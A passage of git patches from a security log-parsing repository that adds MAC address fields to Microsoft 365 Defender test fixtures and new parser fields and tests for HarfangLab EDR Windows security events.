       "ip": "1.2.3.4",
+      "mac": "84:fa:b1:70:bf:8e",
       "port": 56468
     },
     "host": {
@@ -57,6 +58,7 @@
     "source": {
       "address": "5.6.7.8",
       "ip": "5.6.7.8",
+      "mac": "80:95:bb:71:95:aa",
       "port": 443
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json b/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json
index 317b0a4b1..972c75a8f 100644
--- a/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json
+++ b/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json
@@ -20,6 +20,7 @@
     "destination": {
       "address": "1.2.3.4",
       "ip": "1.2.3.4",
+      "mac": "b0:df:72:9d:29:9b",
       "port": 7680
     },
     "host": {
@@ -51,6 +52,7 @@
     "source": {
       "address": "5.6.7.8",
       "ip": "5.6.7.8",
+      "mac": "10:9f:4b:3c:50:d7",
       "port": 56499
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
index 014fc737b..b744652cb 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
@@ -26,6 +26,7 @@
     "destination": {
       "address": "5.6.7.8",
       "ip": "5.6.7.8",
+      "mac": "0a:ac:f5:b4:e6:37",
       "port": 7680
     },
     "host": {
@@ -57,6 +58,7 @@
     "source": {
       "address": "1.2.3.4",
       "ip": "1.2.3.4",
+      "mac": "18:e8:f8:74:c9:0d",
       "port": 57410
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json b/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json
index 5f95449fd..a05f748e9 100644
--- a/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json
+++ b/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json
@@ -20,6 +20,7 @@
     "destination": {
       "address": "5.6.7.8",
       "ip": "5.6.7.8",
+      "mac": "0a:ac:f5:b4:e6:37",
       "port": 443
     },
     "host": {
@@ -51,6 +52,7 @@
     "source": {
       "address": "1.2.3.4",
       "ip": "1.2.3.4",
+      "mac": "18:e8:f8:74:c9:0d",
       "port": 46112
     }
   }

From 3a75574656be937513b9b68998eec288bc487719 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 18:33:06 +0200
Subject: [PATCH 093/317] chore(Microsoft): apply linter

---
 .../tests/test_device_network_connection.json                 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
index b744652cb..6cb767b10 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 Defender",
         "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
       }
-    },
-    "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n"
+    }
   },
   "expected": {
     "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n",

From 9635bc02d36020195e775e32aa89d0de42901938 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Tue, 1 Oct 2024 15:53:49 +0200
Subject: [PATCH 094/317] Imprve parser with some fields

---
 HarfangLab/harfanglab/CHANGELOG.md            |  6 ++
 HarfangLab/harfanglab/_meta/fields.yml        | 10 +++
 HarfangLab/harfanglab/ingest/parser.yml       | 14 +++-
 .../test_detection_rules_missing_fields.json  | 73 +++++++++++++++++
 .../test_detection_rules_missing_fields1.json | 78 +++++++++++++++++++
 5 files changed, 180 insertions(+), 1 deletion(-)
 create mode 100644 HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
 create mode 100644 HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json

diff --git a/HarfangLab/harfanglab/CHANGELOG.md b/HarfangLab/harfanglab/CHANGELOG.md
index dfad3f782..b51c03c58 100644
--- a/HarfangLab/harfanglab/CHANGELOG.md
+++ b/HarfangLab/harfanglab/CHANGELOG.md
@@ -7,6 +7,12 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### 2024-10-01
+
+### Added
+
+- Add some extra fields
+
 ### 2024-01-18 - 1.1.1
 
 ### Fixed
diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index a9fe32974..ba6699b84 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -823,6 +823,16 @@ action.properties.WorkstationName:
   name: action.properties.WorkstationName
   type: keyword
 
+action.properties.ClassName:
+  description: ''
+  name: action.properties.ClassName
+  type: keyword
+
+action.properties.CompatibleIds:
+  description: ''
+  name: action.properties.CompatibleIds
+  type: keyword
+
 action.properties.param0:
   description: ''
   name: action.properties.param0
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 832463715..33437849b 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -29,6 +29,15 @@ pipeline:
         input_field: "{{json_event.message.event_data.TaskContent}}"
         output_field: message
 
+  - name: parse_member_name
+    filter: "{{json_event.message.event_data.get('MemberName') != None }}"
+    external:
+      name: grok.match
+      properties:
+        input_field: "{{json_event.message.event_data.MemberName}}"
+        output_field: message
+        pattern: "(CN=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
+
   - name: agent_info
 
   - name: network_info
@@ -274,6 +283,7 @@ stages:
           user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
           user.target.name: "{{json_event.message.event_data.TargetUserName}}"
           user.target.domain: "{{json_event.message.event_data.TargetDomainName}}"
+          device.id: "{{json_event.message.event_data.DeviceId}}"
           action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AS security intelligence creation time')}}"
           action.properties.ASsecurityintelligenceversion: "{{json_event.message.event_data.get('AS security intelligence version')}}"
           action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AV security intelligence creation time')}}"
@@ -342,7 +352,8 @@ stages:
           action.properties.LogonGuid: "{{json_event.message.event_data.get('LogonGuid')}}"
           action.properties.LogonProcessName: "{{json_event.message.event_data.get('LogonProcessName')}}"
           action.properties.LogonType: "{{json_event.message.event_data.get('LogonType')}}"
-          action.properties.MemberName: "{{json_event.message.event_data.get('MemberName')}}"
+          action.properties.MemberName: "{{parse_member_name.message.first_name + ' ' + parse_member_name.message.last_name}}"
+          action.properties.CompatibleIds: "{{json_event.message.event_data.get('CompatibleIds')}}"
           action.properties.NRIengineversion: "{{json_event.message.event_data.get('NRI engine version')}}"
           action.properties.NRIsecurityintelligenceversion: "{{json_event.message.event_data.get('NRI security intelligence version')}}"
           action.properties.NotValidAfter: "{{json_event.message.event_data.get('NotValidAfter')}}"
@@ -437,6 +448,7 @@ stages:
           action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}"
           action.properties.VirtualAccount: "{{json_event.message.event_data.get('VirtualAccount')}}"
           action.properties.WorkstationName: "{{json_event.message.event_data.get('WorkstationName')}}"
+          action.properties.ClassName: "{{json_event.message.event_data.get('ClassName')}}"
           action.properties.param0: "{{json_event.message.event_data.get('param0')}}"
           action.properties.param10: "{{json_event.message.event_data.get('param10')}}"
           action.properties.param11: "{{json_event.message.event_data.get('param11')}}"
diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
new file mode 100644
index 000000000..06b8a8832
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "HarfangLab EDR",
+        "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2"
+      }
+    },
+    "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}"
+  },
+  "expected": {
+    "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}",
+    "event": {
+      "code": "6416",
+      "dataset": "eventlog",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-26T21:59:58.346000Z",
+    "action": {
+      "id": 6416,
+      "properties": {
+        "ClassName": "ClassnameTest",
+        "SubjectDomainName": "TEST",
+        "SubjectLogonId": "0x3e7",
+        "SubjectUserName": "TEST-MARRA03$",
+        "SubjectUserSid": "S-1-1-11"
+      }
+    },
+    "agent": {
+      "id": "22222222-8888-9999-aaaa-333333333333",
+      "name": "harfanglab"
+    },
+    "device": {
+      "id": "HID\\VID_0000&PID_0000\\0&11111111&0&0000"
+    },
+    "harfanglab": {
+      "groups": [
+        "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"Poste_de_travail_testuser\"}"
+      ]
+    },
+    "host": {
+      "domain": "TEST",
+      "hostname": "test_computer03",
+      "name": "test_computer03",
+      "os": {
+        "full": "Windows 11 Pro",
+        "version": "10.0.22631"
+      }
+    },
+    "log": {
+      "hostname": "test_computer03"
+    },
+    "organization": {
+      "id": "ffAAAAAAFFFAAAADD"
+    },
+    "related": {
+      "hosts": [
+        "test_computer03"
+      ],
+      "user": [
+        "TEST-MARRA03$"
+      ]
+    },
+    "user": {
+      "domain": "TEST",
+      "name": "TEST-MARRA03$",
+      "roles": "Poste_de_travail_testuser"
+    }
+  }
+}
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json
new file mode 100644
index 000000000..7927ea00f
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json
@@ -0,0 +1,78 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "HarfangLab EDR",
+        "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2"
+      }
+    },
+    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}"
+  },
+  "expected": {
+    "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}",
+    "event": {
+      "code": "4728",
+      "dataset": "eventlog",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-26T14:38:37.222000Z",
+    "action": {
+      "id": 4728,
+      "properties": {
+        "MemberName": "JONE Doe",
+        "SubjectDomainName": "TEST",
+        "SubjectLogonId": "0x99913777",
+        "SubjectUserName": "testuser",
+        "SubjectUserSid": "S-2-2-22-22227555-9999999999-9999999919-2402",
+        "TargetDomainName": "TEST",
+        "TargetSid": "S-2-2-22-222222229-9999944444-3976126919-4444",
+        "TargetUserName": "test_exception"
+      }
+    },
+    "agent": {
+      "id": "555555555-9999-9999-9999-3e333333cccc",
+      "name": "harfanglab"
+    },
+    "harfanglab": {
+      "groups": [
+        "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_Windows\"}",
+        "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_haute_disponibilit\\u00e9\"}"
+      ]
+    },
+    "host": {
+      "domain": "TEST",
+      "hostname": "srv-test01",
+      "name": "srv-test01",
+      "os": {
+        "full": "Windows Server 2022 Standard",
+        "version": "10.0.20348"
+      }
+    },
+    "log": {
+      "hostname": "srv-test01"
+    },
+    "organization": {
+      "id": "fffffca6b999999"
+    },
+    "related": {
+      "hosts": [
+        "srv-test01"
+      ],
+      "user": [
+        "testuser"
+      ]
+    },
+    "user": {
+      "domain": "TEST",
+      "name": "testuser",
+      "roles": "TEST_Serveurs_Windows,TEST_Serveurs_haute_disponibilit\u00e9",
+      "target": {
+        "domain": "TEST",
+        "name": "test_exception"
+      }
+    }
+  }
+}
\ No newline at end of file

From e8486c5dbf017d46a73613ee0e667122db534c53 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Tue, 1 Oct 2024 15:58:20 +0200
Subject: [PATCH 095/317] Apply linter

---
 HarfangLab/harfanglab/_meta/fields.yml        | 20 +++++++++----------
 .../test_detection_rules_missing_fields.json  |  4 ++--
 .../test_detection_rules_missing_fields1.json |  4 ++--
 3 files changed, 14 insertions(+), 14 deletions(-)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index ba6699b84..40d115641 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -103,6 +103,11 @@ action.properties.CertThumbprint:
   name: action.properties.CertThumbprint
   type: keyword
 
+action.properties.ClassName:
+  description: ''
+  name: action.properties.ClassName
+  type: keyword
+
 action.properties.ClientProcessId:
   description: ''
   name: action.properties.ClientProcessId
@@ -113,6 +118,11 @@ action.properties.ClientProcessStartKey:
   name: action.properties.ClientProcessStartKey
   type: keyword
 
+action.properties.CompatibleIds:
+  description: ''
+  name: action.properties.CompatibleIds
+  type: keyword
+
 action.properties.DetectionID:
   description: ''
   name: action.properties.DetectionID
@@ -823,16 +833,6 @@ action.properties.WorkstationName:
   name: action.properties.WorkstationName
   type: keyword
 
-action.properties.ClassName:
-  description: ''
-  name: action.properties.ClassName
-  type: keyword
-
-action.properties.CompatibleIds:
-  description: ''
-  name: action.properties.CompatibleIds
-  type: keyword
-
 action.properties.param0:
   description: ''
   name: action.properties.param0
diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
index 06b8a8832..46d0a321b 100644
--- a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
+++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description 